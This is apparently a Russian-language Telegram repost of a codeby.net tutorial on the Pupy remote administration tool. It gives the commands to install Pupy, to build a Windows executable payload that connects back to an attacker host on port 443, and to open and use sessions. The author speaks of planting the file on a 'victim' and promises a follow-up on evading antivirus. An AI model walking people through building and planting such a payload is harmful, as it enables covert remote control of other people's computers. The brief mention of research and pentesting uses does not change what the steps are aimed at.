PUPY Remote Administration Tool (RAT)

PUPY Remote Administration Tool (RAT)

@webware

t.me/webware

Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом.


Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти.

Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ... 


После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework ,как интерфейсом так и модулями которые разработчики вложили в сей продукт.


Я считаю что его можно отлично использовать для:

  • security research
  • обучения
  • пентестинга
  • администрирования

И так давайте все же познакомимся с ним по ближе.


Создаем PAYLOAD

Ну для начала скачаем все же и установим зависимости(я делаk на Kali Linux):

git clone https://github.com/n1nj4sec/pupy.git pupy
cd pupy
git submodule update --init --depth 1 pupy/payload_templates
git submodule init
git submodule update
pip install -r requirements.txt


Дальше идем в папку pupy и там нас пока что интересуют только два файла:

pupygen.py -сам билдер(генератор) так сказать и pupysh.py сама серверная часть,консоль управления.

Я попытаюсь кратко описать функционал,иначе статья будет очень длинная. Одна из фишек этой тулзы это транспорты и скриплеты которые позволяют выбирать тип шифрования трафика ,а скриплеты позволяют запустить какой то модуль сразу же при старте вредоноса(например кейлоггер) Посмотреть список скриплетов и транспортов можно командой

 python pupygen.py -l

Cгенерировать бинарник под виндоус систему можно следующей командой:

./pupygen.py -f exe_x86 -o ~/DarkNode.exe connect --host 192.168.137.137:443

После этого парим жертве(правда он скорее всего спалится антивирусом,но в следующих статья я научу его вас обходить,это ознакомительная часть)


Дальше все очень похоже на метерпретер сессию метаслоита:

Открываем сессию командой

session -i 1

пользуемся командамы

help

list_modules

run module_name -h

Спасибо за внимания.C Вами был DarkNode)

Источник codeby.net

Report Page